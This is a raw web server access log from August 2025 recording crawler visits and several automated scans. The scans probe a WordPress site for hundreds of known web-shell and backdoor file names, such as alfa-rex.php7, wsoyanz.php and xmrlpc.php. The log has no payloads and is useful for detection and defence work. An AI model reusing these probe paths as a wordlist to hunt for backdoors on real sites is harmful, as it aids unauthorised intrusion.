199.45.154.145 - - [12/Aug/2025:04:24:50 +0300] "GET /.well-known/security.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
101.99.88.90 - - [12/Aug/2025:04:31:53 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:31:03 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:31:04 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:31:53 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:40:37 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:47:13 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:47:18 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.187.89.161 - - [12/Aug/2025:04:48:15 +0300] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:17 +0300] "GET /.trash7309/index.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:18 +0300] "GET /deployment.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:20 +0300] "GET /goat.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:21 +0300] "GET /sHS.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:21 +0300] "GET /checkbox.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:22 +0300] "GET /suu.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:24 +0300] "GET /debug.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:26 +0300] "GET /6.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:26 +0300] "GET /header.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:27 +0300] "GET /5index.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:27 +0300] "GET /staging.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:28 +0300] "GET /faq.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:28 +0300] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:29 +0300] "GET /filemanager.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:29 +0300] "GET /403.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:30 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:30 +0300] "GET /wp-content/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:31 +0300] "GET /wp-admin/js/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
52.187.89.161 - - [12/Aug/2025:04:48:31 +0300] "GET /wp-admin/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
101.99.88.90 - - [12/Aug/2025:04:46:41 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:54:51 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:58:53 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:04:59:15 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:05:00:44 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:05:21:50 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.141.116 - - [12/Aug/2025:05:22:44 +0300] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
101.99.76.20 - - [12/Aug/2025:05:31:40 +0300] "GET /wp-includes/js/dist/development/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-includes/js/dist/development/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
89.163.242.76 - - [12/Aug/2025:05:30:32 +0300] "GET /gdftps.php HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
40.69.66.178 - - [12/Aug/2025:05:34:57 +0300] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:57 +0300] "GET /admin-ajax.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:57 +0300] "GET /fix.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:58 +0300] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:58 +0300] "GET /man.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:58 +0300] "GET /ol.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:58 +0300] "GET /as.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:59 +0300] "GET /masfix.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:59 +0300] "GET /acp.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:59 +0300] "GET /php.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:59 +0300] "GET /shell20250630.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:34:59 +0300] "GET /w3llstore.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:35:00 +0300] "GET /app/include/libs/sysplugins/smarty_internal_compile_qcache.php HTTP/1.1" 301 795 "-" "-"
40.69.66.178 - - [12/Aug/2025:05:35:00 +0300] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
194.102.104.219 - - [12/Aug/2025:05:44:06 +0300] "GET /wp-includes/js/dist/development/ HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-includes/js/dist/development/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.88.90 - - [12/Aug/2025:05:45:38 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:05:45:39 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:05:46:01 +0300] "GET //wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
114.119.130.178 - - [12/Aug/2025:05:36:17 +0300] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
101.99.88.90 - - [12/Aug/2025:05:38:31 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [12/Aug/2025:05:45:35 +0300] "GET //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
101.99.88.90 - - [12/Aug/2025:05:45:42 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:05:45:45 +0300] "GET //wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
101.99.88.90 - - [12/Aug/2025:05:45:57 +0300] "POST //wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "GuzzleHttp/7"
63.141.250.58 - - [12/Aug/2025:05:54:06 +0300] "GET /index.php?params=1 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
101.99.76.20 - - [12/Aug/2025:06:02:43 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-admin/css/colors/blue/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.76.20 - - [12/Aug/2025:06:06:25 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "http://otwalmanwalaw.co.ke/wp-admin/css/colors/blue/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
13.74.46.110 - - [12/Aug/2025:06:09:37 +0300] "GET /wp-includes/Requests/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:37 +0300] "GET /wp-includes/style-engine/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:37 +0300] "GET /wp-includes/rest-api/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:38 +0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:38 +0300] "GET /wp-content/banners/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:38 +0300] "GET /wp-content/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:38 +0300] "GET /.well-known/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:39 +0300] "GET /wp-includes/Text/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:39 +0300] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:39 +0300] "GET /img/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:39 +0300] "GET /wp-content/languages/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:40 +0300] "GET /wp-includes/customize/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:40 +0300] "GET /wp-includes.bak/html-api/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:40 +0300] "GET /wp-includes/widgets/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:40 +0300] "GET /wp-includes/IXR/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:40 +0300] "GET /wp-admin/js/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:41 +0300] "GET /gmo.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:41 +0300] "GET /k.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:41 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:41 +0300] "GET /.well-known/pki-validation/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:42 +0300] "GET /wp-includes/pomo/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:42 +0300] "GET /wp-includes/block-patterns/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:42 +0300] "GET /wp-content/updraft/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:42 +0300] "GET /wp-content/upgrade-temp-backup/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:43 +0300] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:43 +0300] "GET /wp-admin/includes/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:43 +0300] "GET /images/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:43 +0300] "GET /wp-content/blogs.dir/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:43 +0300] "GET /wp-includes/images/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:44 +0300] "GET /wp-includes/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:44 +0300] "GET /cgi-bin/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:44 +0300] "GET /wp-content/gallery/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:44 +0300] "GET /wp-includes/blocks/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:45 +0300] "GET /wp-admin/css/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:45 +0300] "GET /wp-admin/images/about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:45 +0300] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:45 +0300] "GET /.well-known/acme-challenge/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:46 +0300] "GET /wp-admin/network/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:46 +0300] "GET /cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:46 +0300] "GET /cgi-bin/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:46 +0300] "GET /wp-content/updates.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:46 +0300] "GET /c.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:47 +0300] "GET /css/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:47 +0300] "GET /wp-admin/user/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:47 +0300] "GET /img/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:47 +0300] "GET /wp-admin/css/colors/coffee/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:48 +0300] "GET /wp-admin/images/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:48 +0300] "GET /avaa.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:48 +0300] "GET /images/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:48 +0300] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:49 +0300] "GET /wp-includes/Requests/Text/admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:49 +0300] "GET /wp-admin/css/colors/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:49 +0300] "GET /wp-admin/includes/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:49 +0300] "GET /wp-admin/css/colors/blue/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:49 +0300] "GET /wp-admin/cloud.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:50 +0300] "GET /updates.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:50 +0300] "GET /help.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:50 +0300] "GET /libraries/legacy/updates.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:50 +0300] "GET /libraries/phpmailer/updates.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:51 +0300] "GET /libraries/vendor/updates.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:51 +0300] "GET /alfa-rex.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:51 +0300] "GET /alfanew.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:51 +0300] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:51 +0300] "GET /wp-admin/js/widgets/about.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:52 +0300] "GET /wp-p.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:52 +0300] "GET /wp-admin/repeater.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:52 +0300] "GET /wp-includes/repeater.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:52 +0300] "GET /wp-content/repeater.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:53 +0300] "GET /wsoyanz.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:53 +0300] "GET /yanz.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:53 +0300] "GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:53 +0300] "GET /wp-content/plugins/seoo/wsoyanz1.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:54 +0300] "GET /cache-compat.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:54 +0300] "GET /ajax-actions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:54 +0300] "GET /wp-admin/ajax-actions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:54 +0300] "GET /wp-consar.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:55 +0300] "GET /repeater.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:55 +0300] "GET /admin-post.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:55 +0300] "GET /wp-admin/maint/maint/ajax-actions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:55 +0300] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:55 +0300] "GET /wp-admin/css/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:56 +0300] "GET /dropdown.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:56 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:56 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:56 +0300] "GET /about.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:57 +0300] "GET /alfanew.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:57 +0300] "GET /adminfuns.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:57 +0300] "GET /ebs.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:57 +0300] "GET /ws.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:58 +0300] "GET /alfanew2.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:58 +0300] "GET /alfa-rex2.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:58 +0300] "GET /1.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:58 +0300] "GET /2.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:58 +0300] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:59 +0300] "GET /wp-admin/images/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:59 +0300] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:59 +0300] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:09:59 +0300] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:00 +0300] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:00 +0300] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:00 +0300] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:00 +0300] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:01 +0300] "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:01 +0300] "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:01 +0300] "GET /wp-admin/network/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:01 +0300] "GET /xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:02 +0300] "GET /send.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:02 +0300] "GET /mar.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:02 +0300] "GET /cgi-bin/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:02 +0300] "GET /css/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:03 +0300] "GET /wp-admin/user/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:03 +0300] "GET /img/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:03 +0300] "GET /wp-admin/css/colors/coffee/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:03 +0300] "GET /wp-admin/images/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:04 +0300] "GET /images/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:04 +0300] "GET /wp-admin/js/widgets/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:04 +0300] "GET /wp-admin/css/colors/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:04 +0300] "GET /wp-admin/includes/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:05 +0300] "GET /wp-admin/css/colors/blue/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:05 +0300] "GET /wp-admin/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:06 +0300] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:06 +0300] "GET /wp.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:06 +0300] "GET /index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:06 +0300] "GET /about.php?525 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:07 +0300] "GET /wp-content/themes/kadence/functions.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:07 +0300] "GET /.well-known/acme-challenge/admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:08 +0300] "GET /install.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:08 +0300] "GET /wp-content/plugins/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:08 +0300] "GET /wp-admin.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:08 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:08 +0300] "GET /wp-content/uploads/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:09 +0300] "GET /xx.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:09 +0300] "GET /wp-content/db-cache.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:09 +0300] "GET /blog.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:09 +0300] "GET /index/function.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:10 +0300] "GET /inputs.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:10 +0300] "GET /wp-content/index.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:10 +0300] "GET /file.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:10 +0300] "GET /ty.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:10 +0300] "GET /lock360.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:11 +0300] "GET /bypass.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:11 +0300] "GET /edit.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:11 +0300] "GET /readme.php HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:11 +0300] "GET /admin.php7 HTTP/1.1" 301 795 "-" "-"
13.74.46.110 - - [12/Aug/2025:06:10:12 +0300] "GET /xl.php HTTP/1.1" 301 795 "-" "-"
